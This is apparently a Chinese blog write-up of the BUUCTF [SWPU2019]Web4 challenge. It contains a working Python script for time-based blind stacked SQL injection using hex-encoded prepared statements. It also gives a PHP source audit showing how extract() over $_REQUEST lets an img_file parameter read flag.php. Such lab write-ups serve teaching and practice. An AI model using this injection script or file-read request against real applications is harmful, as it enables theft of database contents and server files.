[SWPU2019]Web4 盲注+代码审查

最新推荐文章于 2022-09-02 23:49:01 发布
最新推荐文章于 2022-09-02 23:49:01 发布
阅读量810 收藏 2
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124898152
版权

开始用dirsearch扫描了一下后台,发现没扫出啥玩意儿,或许是一个注入题(又到我的弱处了),先常规的使用 ' ; # 来判断一下

 发现当我们只输入1'的时候发现是一个函数文件CBTool.php报错,而1的时候是一个正常的echo 错误

看来username确实存在注入点,但不知道是哪个方面的注入 ,试了一下异或,盲注都不行,又超出我注入浅薄的知识了,学习得知一个方法:当输入1'报错,但是1"没有报错的话,那就是堆叠注入了,然后我试了一下最基本的一些堆叠注入,发现都被过滤了,真是有点严啊……

学习得知这是基于PDO下的堆叠注入PDO场景下的SQL注入探究 - 先知社区

要用到预编译法(我把这个方法给忘记了)

import requests
import time
url="http://3e50045c-07a0-4474-a0cb-14b41c612f29.node4.buuoj.cn:81/index.php?r=Login/Login"
flag=""
def str_to_hex(s):#字符转十六进制
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])

for i in range(1,40):
    print(i)
    for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.":
        #ord()将字符串转为ascii,因为在测试中得不到特殊页面,因此利用sleep(3)来判断是否注入成功
        sql = "select if((ascii(substr((select group_concat(flag) from flag),"+str(i)+",1))='"+str(ord(str1))+"'),sleep(3),2);"   # ctf
        sql_hex = str_to_hex(sql)#sql被抓转换为了十六进制数
        data={
            "username":"1\';SET @a=0x"+str(sql_hex)+";PREPARE st FROM @a;EXECUTE st;",#预处理
            "password":"123"
        }
        time1=time.time()
        result=requests.post(url,json=data)#timeout一个数字或一个元组,指示等待客户端建立连接和/或发送响应的秒数
        if time.time()-time1>=3:#利用python中time库来判断执行post请求前的时间戳和执行后的时间戳中的时间来知道是否执行成功sql语句
            flag+=str((str1))
            print(flag)
            break
print(flag)
#glzjinwantsaliendzip
#glzjinnts_a_girl_friendzip
#glzjinwantsgirliendzip
#glzjin_wants_a_girl_friend.zip

因为在测试过程中得不到我们想要的回显界面,因此利用时间函数sleep(n)成功执行则会延迟n秒,结合time库的time()函数返回请求前后的时间戳是否大于等于3来得知是否执行成功;这里转换为十六进制是避免过滤,因为在数据库中十六进制数是可以直接识别的

不理解为什么其他wp都是直接select flag from flag的,可能是懒得写了,只需要自己改一下语句一个个找即可

最后会出来一个安装包glzjin_wants_a_girl_friend.zip,打开是一堆源码,找到最关键的函数

 可以发现有一个flag.php文件,看来是要在源码中找到切入点读取flag.php文件了 

if(!empty($_REQUEST['r']))
{
	$r = explode('/', $_REQUEST['r']);//以/为媒介,分割r参数传进来的数据
	list($controller,$action) = $r;//相当于$controller存储数组第一位,$action存储数组第二位
	$controller = "{$controller}Controller";
	$action = "action{$action}";


	if(class_exists($controller))//类是否存在
	{
		if(method_exists($controller,$action))//检查类的方法是否存在,如果存在可以避免变量覆盖
		{
			//
		}
		else
		{
			$action = "actionIndex";
		}
	}
	else
	{
		$controller = "LoginController";
        $action = "actionIndex";
	}
    $data = call_user_func(array( (new $controller), $action));//调用类$controller中的方法$action
} else {
    header("Location:index.php?r=Login/Index");
}

在fun.php中看到我们可以传入的参数r

经过explode函数分割,然后list赋值,再经过{}拼接在一起,测试如下

 相当于将r传入的路径如/index/flag,将他们分割开来,第一个拼接Controller为……,第二个拼接action

$controller = "{$controller}Controller";
$action = "action{$action}";
假如r传入/index/flag
->
$controller =indexController
$action=actionflag

暂时不清楚功能是啥,继续往下看,一个 class_exists()判断该类是否存在,一个method_exists判断该类中的方法是否存在

类不存在则会变量覆盖

else
	{
		$controller = "LoginController";
        $action = "actionIndex";
	}

然后最后是一个call_user_func函数,当第一个参数是类名的时候,则会调用该类中的$action方法

结合我们的源码有BaseController.php,UserController……这里我们可以控制调用哪个类哪个方法,因此我们去看看别的源码

class UserController extends BaseController
{
	// 访问列表
	public function actionList()
	{
		$params = $_REQUEST;
		$userModel = new UserModel();
		$listData = $userModel->getPageList($params);
		$this->loadView('userList', $listData );
	}
    public function actionIndex()
    {
        $listData = $_REQUEST;
        $this->loadView('userIndex',$listData);
    }

}

都是action开头的方法,都调用了父类的loadView函数,并且传入两个参数(注意这里的第二个参数$listData是我们可以通过$_REQUEST控制的)

public function loadView($viewName ='', $viewData = [])
	{//$this->loadView('userIndex',$listData);
		$this->viewPath = BASE_PATH . "/View/{$viewName}.php";
		if(file_exists($this->viewPath))
		{
			extract($viewData);
			include $this->viewPath;
		}
	}

 将参数传入后上面路径会构成userIndex.php文件,并且include打开,其实我本来想通过控制第二个参数来进行extract函数覆盖变量以达到控制include使用,但是该函数第一步进行了再一次的viewPath覆盖,因此这个办法不行,我们去看一下它include那个函数文件

if(!isset($img_file)) {
                    $img_file = '/../favicon.ico';
                }
                $img_dir = dirname(__FILE__) . $img_file;
                $img_base64 = imgToBase64($img_dir);
                echo '<img src="' . $img_base64 . '">';       //图片形式展示

判断变量$img_file是否存在,经过imgToBase64函数后进行echo输出

<?php
function imgToBase64($img_file) {

    $img_base64 = '';
    if (file_exists($img_file)) {
        $app_img_file = $img_file; // 图片路径
        $img_info = getimagesize($app_img_file); // 取得图片的大小,类型等

        $fp = fopen($app_img_file, "r"); // 图片是否可读权限

        if ($fp) {
            $filesize = filesize($app_img_file);
            $content = fread($fp, $filesize);
            $file_content = chunk_split(base64_encode($content)); // base64编码,从文件中读取内容
            switch ($img_info[2]) {           //判读图片类型
                case 1: $img_type = "gif";
                    break;
                case 2: $img_type = "jpg";
                    break;
                case 3: $img_type = "png";
                    break;
            }

            $img_base64 = 'data:image/' . $img_type . ';base64,' . $file_content;//合成图片的base64编码

        }
        fclose($fp);
    }

    return $img_base64; //返回图片的base64
}
?>

函数审查中我们可以看到一个content变量,经过了fread函数

说白了这个函数作用就是读取$img_file路径文件的内容,并且base64输出, 因为有extract和$_REQUEST的结合,我们可以控制$img_file为我们所用,因此这题思路如下:

通过fun.php中的r变量来控制我们所需要调用的类
分析可得
r=User/Index
通过调用UserController类中的actionIndex函数利用$_REQUEST
传入
img_file=/../flag.php(不知道哪个位置就多试几次)
经过调用父类的loadView函数
调用extract->img_file=/../flag.php进行变量赋值
打开userIndex文件
通过imgToBase64函数读取/../flag.php的内容
然后进行base64加密后的echo输出得到flag

 感觉这题就难在盲注上面了,多了一个sleep方法

-栀蓝-
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB代码审计
12-05
一个关于代码审计的书,里面讲解的很详细,值得收藏,
[SWPU2019]Web4
fmyyy1的博客
04-25 463
场景 点登陆没反应,注册提示未开发,猜测sql注入。 抓包在username里添加单引号报错,闭合后提示: 参考wp是要堆叠注入,并且过滤了很多关键字,需要用十六进制和预处理语句注入。 PDO场景下的sql注入 import time import requests import json def str_to_hex(str): return ''.join(hex(ord(c)).replace('0x', '') for c in str) def binary(iterator,
BUUCTF:[SWPU2019]Web4
末初的CSDN博客
03-30 2720
[SWPU2019]Web4 参考:https://www.anquanke.com/post/id/194640#h3-4 题目只有一个登录框,输入账号密码后点击登陆页面无任何相应,注册功能也是尚未开放。查看源代码可以看到一个js文件,F12也可以看到一个网络请求。 js主要功能是将username和password以json格式然后发给index.php?r=Login/Login。 不难发...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
swpu前端实验4的实验
04-23
swpu
本项目为SWPU数据库原理及应用大作业《西柚外卖订餐系统》,基于Python+Flask+MySQL开发+源代码+文档说明
12-01
该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! ...
SWPU大数据概论课程报告
最新发布
01-31
《SWPU大数据概论课程报告》是一份详细探讨大数据领域的学习资料,主要针对对大数据感兴趣的学员或研究人员。作为一份课程报告,它很可能包含了大数据的基本概念、核心技术、应用领域以及未来发展趋势等多个方面的...
PDO预处理&& [SWPU2019]Web4
Je3Z的博客
08-13 172
PDO场景下的SQL注入探究 例题 [SWPU2019]Web4 参考 由于题目对username进行了严格的检测,所以无法使用单语句进行注入,但是注入点又存在,于是可以尝试进行堆叠注入。(很多师傅可能就因为不友好的回显卡在这里) 思路 我们但加'报错,然后后面加#正常了,然后我们再尝试了';回显也是正常的,若无法多语句执行,返回页面按理说应该是500,这个正常说明开启了堆叠注入,所以可以联想到想到预处理 import requests,time import json def str_to_hex
第五十五题——[SWPU2019]Web1
分享简单的安全技术
04-29 135
题目地址:https://buuoj.cn/challenges 解题思路 阴间题目,需要手动测试到22列,拜拜了您嘞,参考链接:点这里跳转 获取flag 使用union select 1,2,3可以看到过滤了空格,使unionselect合在了一起,可以使用/**/代替空格 使用union/**/select/**/1,2,3,.....,22'看到了回显 在使用union select查询不存在的数据时会构造查询的列名以及值满足查询要求,所以再不知道表明时,可以构造表名,查询出那一列的内
详解2016 SWPU CTF web4
一个码农的笔记
10-31 3538
2016年的swpu结束了,很精彩,我玩的很开心 这个题目我在比赛的时候没有做出来,后来根据官方的wp复现了一遍,学到很多东西,官方的wp地址是:http://bobao.360.cn/ctf/detail/173.html 官方给的web4的题解不是特别详细 现在我详细的讲解一下web4,我会详细讲解web4所有的知识点 首先网站有源码泄露,在:web4.08067.me/web/w
[SWPU2019]Web1
weixin_43940853的博客
01-15 2963
这是一个留言板的二次注入 当时自己用的是报错注入,结果并没有做出来,看其他人的wp用的是union注入,并且有22个字段
web-代码审计】(14.1)代码审查方法
09-02 1211
代码审查方法】
SWPUCTF web 部分题解
a3320315的博客
01-01 1112
0x01 web1 easyweb 随便注册个账号登陆后,测试发现留言处的title字段存在二次注入 有报错和回显,但是报错过滤了extractvalue和updatexml 考虑使用union,但是过滤了or,不能使用information_schema 对于mysql>5.7的版本,有sys数据库,前提是root权限才能访问 innodb_index_stats和innodb_tab...
[SWPU2019]Web6
lllffg的博客
03-16 720
[SWPU2019]Web6 SQL注入中的with rollup 利用session.upload_progress进行文件包含和反序列化渗透 一个登陆页面,尝试一下1’ and sleep(4)#后弹出被过滤的回显,然后怎么都没思路,然后输入了下万能密码1’ or 1=1 or ‘1’='1,回显了passwd错误,这证明只对passwd进行的检测 看了下wp 猜测源码太狠了 $sql="select * from users where username='$name' and passwd='$
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值